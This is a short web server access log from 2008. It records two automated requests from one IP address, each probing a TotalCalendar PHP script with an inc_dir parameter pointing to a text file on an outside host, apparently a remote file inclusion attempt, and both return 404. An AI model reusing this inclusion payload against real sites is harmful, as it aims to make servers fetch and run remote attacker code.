65.98.70.18 - - [29/Jul/2008:09:49:56 -0700] "GET /logs/access_080218.log//modules/TotalCalendar/about.php?inc_dir=http://moisidis.gr/siteframe/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.70.18 - - [29/Jul/2008:09:49:56 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://moisidis.gr/siteframe/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
